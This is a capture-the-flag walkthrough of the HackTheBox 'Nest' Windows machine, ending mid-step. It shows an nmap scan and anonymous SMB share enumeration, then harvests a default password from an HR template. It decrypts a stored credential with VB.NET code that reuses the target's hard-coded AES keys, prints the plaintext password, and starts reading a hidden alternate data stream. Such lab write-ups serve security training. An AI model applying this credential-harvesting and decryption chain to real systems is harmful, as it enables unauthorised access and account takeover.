Nest is one of the machines currently available on the HackTheBox hacking platform and is rated easy.
In this case it is a machine based on the Windows operating system.
Port scan
As usual, we add the IP of the Nest machine, 10.10.10.178, to /etc/hosts as nest.htb and start with the nmap port scan.
# Nmap 7.80 scan initiated Fri May  8 09:33:40 2020 as: nmap -Pn -A -T5 -p1-65535 -oA nest-nmap 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.055s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=5/8%Time=5EB50BD7%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x
SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the
SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\
SF:r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\n
SF:DEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookie
SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionRe
SF:q,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20c
SF:ommand\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Re
SF:porting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
|_clock-skew: 3m31s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-08T07:42:04
|_  start_date: 2020-05-08T04:33:05

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   53.44 ms 10.10.14.1
2   57.00 ms 10.10.10.178

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May  8 09:39:09 2020 -- 1 IP address (1 host up) scanned in 329.27 seconds
We see that port 445 is open, so let's check whether we can obtain relevant information about the machine through it.
SMB enumeration
At first glance we see several shared folders that are visible without needing a password:
# smbclient -L \\\\10.10.10.178
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Data            Disk      
	IPC$            IPC       Remote IPC
	Secure$         Disk      
	Users           Disk      
SMB1 disabled -- no workgroup available
We go through the directories and find interesting files in the Data folder:
# smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
  .                                   D        0  Wed Aug  7 21:07:51 2019
  ..                                  D        0  Wed Aug  7 21:07:51 2019
  Maintenance                         D        0  Wed Aug  7 21:07:32 2019
  Templates                           D        0  Wed Aug  7 21:08:07 2019

\Shared\Maintenance
  .                                   D        0  Wed Aug  7 21:07:32 2019
  ..                                  D        0  Wed Aug  7 21:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 01:01:44 2019

\Shared\Templates
  .                                   D        0  Wed Aug  7 21:08:07 2019
  ..                                  D        0  Wed Aug  7 21:08:07 2019
  HR                                  D        0  Wed Aug  7 21:08:01 2019
  Marketing                           D        0  Wed Aug  7 21:08:06 2019

\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 21:08:01 2019
  ..                                  D        0  Wed Aug  7 21:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 21:08:06 2019
  ..                                  D        0  Wed Aug  7 21:08:06 2019
smb: \> 
So we download the files "Maintenance Alerts.txt" and "Welcome Email.txt" to review them:
smb: \Shared\> cd Maintenance\
smb: \Shared\Maintenance\> mget Alerts.txt
NT_STATUS_NO_SUCH_FILE listing \Shared\Maintenance\Alerts.txt
smb: \Shared\Maintenance\> exit
root@kali:/data/ctf/htb/machines/todo/nest.htb# smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> cd Shared\Maintenance\
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)
smb: \Shared\Maintenance\> cd ../Templates/HR
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (1,9 KiloBytes/sec) (average 1,0 KiloBytes/sec)
smb: \Shared\Templates\HR\> 
And we check their contents:
# cat Maintenance\ Alerts.txt
There is currently no scheduled maintenance work
root# cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR
root# 
We find a username and password in the file "Welcome Email.txt", which we will try next to log in over SMB and reach other shared folders.
We log in with that user to the same Data share and see more files and directories than before:
# smbclient \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

\IT
  .                                   D        0  Thu Aug  8 00:58:07 2019
  ..                                  D        0  Thu Aug  8 00:58:07 2019
  Archive                             D        0  Tue Aug  6 00:33:58 2019
  Configs                             D        0  Thu Aug  8 00:59:34 2019
  Installs                            D        0  Thu Aug  8 00:08:30 2019
  Reports                             D        0  Sun Jan 26 01:09:13 2020
  Tools                               D        0  Tue Aug  6 00:33:43 2019

\Production
  .                                   D        0  Mon Aug  5 23:53:38 2019
  ..                                  D        0  Mon Aug  5 23:53:38 2019

\Reports
  .                                   D        0  Mon Aug  5 23:53:44 2019
  ..                                  D        0  Mon Aug  5 23:53:44 2019

\Shared
  .                                   D        0  Wed Aug  7 21:07:51 2019
  ..                                  D        0  Wed Aug  7 21:07:51 2019
  Maintenance                         D        0  Wed Aug  7 21:07:32 2019
  Templates                           D        0  Wed Aug  7 21:08:07 2019

\IT\Archive
  .                                   D        0  Tue Aug  6 00:33:58 2019
  ..                                  D        0  Tue Aug  6 00:33:58 2019

\IT\Configs
  .                                   D        0  Thu Aug  8 00:59:34 2019
  ..                                  D        0  Thu Aug  8 00:59:34 2019
  Adobe                               D        0  Wed Aug  7 21:20:09 2019
  Atlas                               D        0  Tue Aug  6 13:16:18 2019
  DLink                               D        0  Tue Aug  6 15:25:27 2019
  Microsoft                           D        0  Wed Aug  7 21:23:26 2019
  NotepadPlusPlus                     D        0  Wed Aug  7 21:31:37 2019
  RU Scanner                          D        0  Wed Aug  7 22:01:13 2019
  Server Manager                      D        0  Tue Aug  6 15:25:19 2019

\IT\Installs
  .                                   D        0  Thu Aug  8 00:08:30 2019
  ..                                  D        0  Thu Aug  8 00:08:30 2019

\IT\Reports
  .                                   D        0  Sun Jan 26 01:09:13 2020
  ..                                  D        0  Sun Jan 26 01:09:13 2020

\IT\Tools
  .                                   D        0  Tue Aug  6 00:33:43 2019
  ..                                  D        0  Tue Aug  6 00:33:43 2019

\Shared\Maintenance
  .                                   D        0  Wed Aug  7 21:07:32 2019
  ..                                  D        0  Wed Aug  7 21:07:32 2019
  Maintenance Alerts.txt              A       48  Tue Aug  6 01:01:44 2019

\Shared\Templates
  .                                   D        0  Wed Aug  7 21:08:07 2019
  ..                                  D        0  Wed Aug  7 21:08:07 2019
  HR                                  D        0  Wed Aug  7 21:08:01 2019
  Marketing                           D        0  Wed Aug  7 21:08:06 2019

\IT\Configs\Adobe
  .                                   D        0  Wed Aug  7 21:20:09 2019
  ..                                  D        0  Wed Aug  7 21:20:09 2019
  editing.xml                        AH      246  Sat Aug  3 14:58:42 2019
  Options.txt                         A        0  Mon Oct 10 23:11:14 2011
  projects.xml                        A      258  Tue Jan  8 17:30:52 2013
  settings.xml                        A     1274  Wed Aug  7 21:19:12 2019

\IT\Configs\Atlas
  .                                   D        0  Tue Aug  6 13:16:18 2019
  ..                                  D        0  Tue Aug  6 13:16:18 2019
  Temp.XML                            A     1369  Wed Jun 11 09:38:22 2003

\IT\Configs\DLink
  .                                   D        0  Tue Aug  6 15:25:27 2019
  ..                                  D        0  Tue Aug  6 15:25:27 2019

\IT\Configs\Microsoft
  .                                   D        0  Wed Aug  7 21:23:26 2019
  ..                                  D        0  Wed Aug  7 21:23:26 2019
  Options.xml                         A     4598  Sat Mar  3 20:24:24 2012

\IT\Configs\NotepadPlusPlus
  .                                   D        0  Wed Aug  7 21:31:37 2019
  ..                                  D        0  Wed Aug  7 21:31:37 2019
  config.xml                          A     6451  Thu Aug  8 01:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 21:30:27 2019

\IT\Configs\RU Scanner
  .                                   D        0  Wed Aug  7 22:01:13 2019
  ..                                  D        0  Wed Aug  7 22:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 21:49:37 2019

\IT\Configs\Server Manager
  .                                   D        0  Tue Aug  6 15:25:19 2019
  ..                                  D        0  Tue Aug  6 15:25:19 2019

\Shared\Templates\HR
  .                                   D        0  Wed Aug  7 21:08:01 2019
  ..                                  D        0  Wed Aug  7 21:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

\Shared\Templates\Marketing
  .                                   D        0  Wed Aug  7 21:08:06 2019
  ..                                  D        0  Wed Aug  7 21:08:06 2019

		10485247 blocks of size 4096. 6543359 blocks available
smb: \> 
Now, to review everything, we download the whole contents of the Data share so we can analyse it in depth:
# smbget -R smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt
Downloaded 16,65kB in 10 seconds
Going through the files, we find two with interesting content, RU_config.xml and config.xml:
# cat IT/Configs/RU\ Scanner/RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
# cat IT/Configs/NotepadPlusPlus/config.xml
<?xml version="1.0" encoding="Windows-1252" ?>
...
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
...
We try to decode the c.smith user's password, which at first glance looks like base64, but we do not get readable characters.
We continue our search and see that we can list the contents of the Secure$ share, but we cannot go any further inside it:
# smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Thu Aug  8 01:08:12 2019
  ..                                  D        0  Thu Aug  8 01:08:12 2019
  Finance                             D        0  Wed Aug  7 21:40:13 2019
  HR                                  D        0  Thu Aug  8 01:08:11 2019
  IT                                  D        0  Thu Aug  8 12:59:25 2019

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\HR
NT_STATUS_ACCESS_DENIED listing \HR\*

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
So, using the path seen earlier in the Notepad++ history, we try to access IT\Carl\ directly. This time we can, so we list it:
smb: \> ls IT\Carl\
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

\IT\Carl\Docs
  .                                   D        0  Wed Aug  7 21:44:00 2019
  ..                                  D        0  Wed Aug  7 21:44:00 2019
  ip.txt                              A       56  Wed Aug  7 21:44:16 2019
  mmc.txt                             A       73  Wed Aug  7 21:43:42 2019

\IT\Carl\Reports
  .                                   D        0  Tue Aug  6 15:45:40 2019
  ..                                  D        0  Tue Aug  6 15:45:40 2019

\IT\Carl\VB Projects
  .                                   D        0  Tue Aug  6 16:41:55 2019
  ..                                  D        0  Tue Aug  6 16:41:55 2019
  Production                          D        0  Tue Aug  6 16:07:13 2019
  WIP                                 D        0  Tue Aug  6 16:47:41 2019

\IT\Carl\VB Projects\Production
  .                                   D        0  Tue Aug  6 16:07:13 2019
  ..                                  D        0  Tue Aug  6 16:07:13 2019

\IT\Carl\VB Projects\WIP
  .                                   D        0  Tue Aug  6 16:47:41 2019
  ..                                  D        0  Tue Aug  6 16:47:41 2019
  RU                                  D        0  Fri Aug  9 17:36:45 2019

\IT\Carl\VB Projects\WIP\RU
  .                                   D        0  Fri Aug  9 17:36:45 2019
  ..                                  D        0  Fri Aug  9 17:36:45 2019
  RUScanner                           D        0  Thu Aug  8 00:05:54 2019
  RUScanner.sln                       A      871  Tue Aug  6 16:45:36 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner
  .                                   D        0  Thu Aug  8 00:05:54 2019
  ..                                  D        0  Thu Aug  8 00:05:54 2019
  bin                                 D        0  Wed Aug  7 22:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 00:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 00:05:44 2019
  My Project                          D        0  Wed Aug  7 22:00:11 2019
  obj                                 D        0  Wed Aug  7 22:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 17:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 14:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 00:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 21:49:35 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
  .                                   D        0  Wed Aug  7 22:00:11 2019
  ..                                  D        0  Wed Aug  7 22:00:11 2019
  Debug                               D        0  Wed Aug  7 21:59:13 2019
  Release                             D        0  Tue Aug  6 14:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
  .                                   D        0  Wed Aug  7 22:00:11 2019
  ..                                  D        0  Wed Aug  7 22:00:11 2019
  Application.Designer.vb             A      441  Tue Aug  6 14:55:13 2019
  Application.myapp                   A      481  Tue Aug  6 14:55:13 2019
  AssemblyInfo.vb                     A     1163  Tue Aug  6 14:55:13 2019
  Resources.Designer.vb               A     2776  Tue Aug  6 14:55:13 2019
  Resources.resx                      A     5612  Tue Aug  6 14:55:13 2019
  Settings.Designer.vb                A     2989  Tue Aug  6 14:55:13 2019
  Settings.settings                   A      279  Tue Aug  6 14:55:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
  .                                   D        0  Wed Aug  7 22:00:11 2019
  ..                                  D        0  Wed Aug  7 22:00:11 2019
  x86                                 D        0  Wed Aug  7 21:59:18 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
  .                                   D        0  Wed Aug  7 21:59:13 2019
  ..                                  D        0  Wed Aug  7 21:59:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
  .                                   D        0  Tue Aug  6 14:55:26 2019
  ..                                  D        0  Tue Aug  6 14:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
  .                                   D        0  Wed Aug  7 21:59:18 2019
  ..                                  D        0  Wed Aug  7 21:59:18 2019

		10485247 blocks of size 4096. 6543359 blocks available
smb: \> 
And then we download its contents:
# smbget -R smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 25,18kB in 14 seconds
Reviewing the source files and using the dotnetfiddle site, we assemble a script from parts of the code in Module1.vb, SsoIntegration.vb and Utils.vb, plus a few extra modifications of our own, ending up with the following:
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Class ConfigFile
        Public Property Port As Integer
        Public Property Username As String
        Public Property Password As String

        Public Sub SaveToFile(Path As String)
            Using File As New System.IO.FileStream(Path, System.IO.FileMode.Create)
                Dim Writer As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
                Writer.Serialize(File, Me)
            End Using
        End Sub

        Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile
            Using File As New System.IO.FileStream(FilePath, System.IO.FileMode.Open)
                Dim Reader As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
                Return DirectCast(Reader.Deserialize(File), ConfigFile)
            End Using
        End Function
    End Class

    ' Every parameter of the scheme (passphrase, salt, iteration count, IV, key size)
    ' is hard-coded in the tool, so anyone with the source can reverse it.
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = System.Convert.FromBase64String(cipherText)

        ' PBKDF2 (HMAC-SHA1 by default) derives the AES key from the passphrase and salt
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        ' AES in CBC mode with the ASCII IV; PKCS#7 padding is the provider default
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As System.IO.MemoryStream
        memoryStream = New System.IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        ' Added so the result is printed when run in dotnetfiddle
        System.Console.WriteLine(plainText)
        Return plainText
    End Function

    Public Class SsoIntegration
        Public Property Username As String
        Public Property Password As String
    End Class

    Sub Main()
        ' Value taken from RU_config.xml
        Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub

End Class
When we run it, we obtain the c.smith user's password in plaintext: xRxRxPANCAK3SxRxRx.
Getting the user flag
With the c.smith user's cleartext password, let's check the contents of the Users share:
# smbclient \\\\10.10.10.178\\Users -U "c.smith"
Enter WORKGROUP\c.smith's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 14:18:42 2019
  ..                                  D        0  Fri Aug  9 14:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 01:41:16 2019
smb: \> 
We see that the c.smith user's home contains the file user.txt, so we download it and have the user flag.
# smbclient \\\\10.10.10.178\\Users -U "c.smith"
Enter WORKGROUP\c.smith's password: 
Try "help" to get a list of possible commands.
smb: \> cd C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

		10485247 blocks of size 4096. 6543238 blocks available
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \C.Smith\> 
Privilege escalation
Continuing the search, we see a file that looks interesting under \C.Smith\HQK Reporting. It is listed as 0 bytes, so we inspect it with allinfo, download it and check its contents:
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    vie ago  9 01:06:12 2019 CEST
access_time:    vie ago  9 01:06:12 2019 CEST
write_time:     vie ago  9 01:08:17 2019 CEST
change_time:    vie ago  9 01:08:17 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
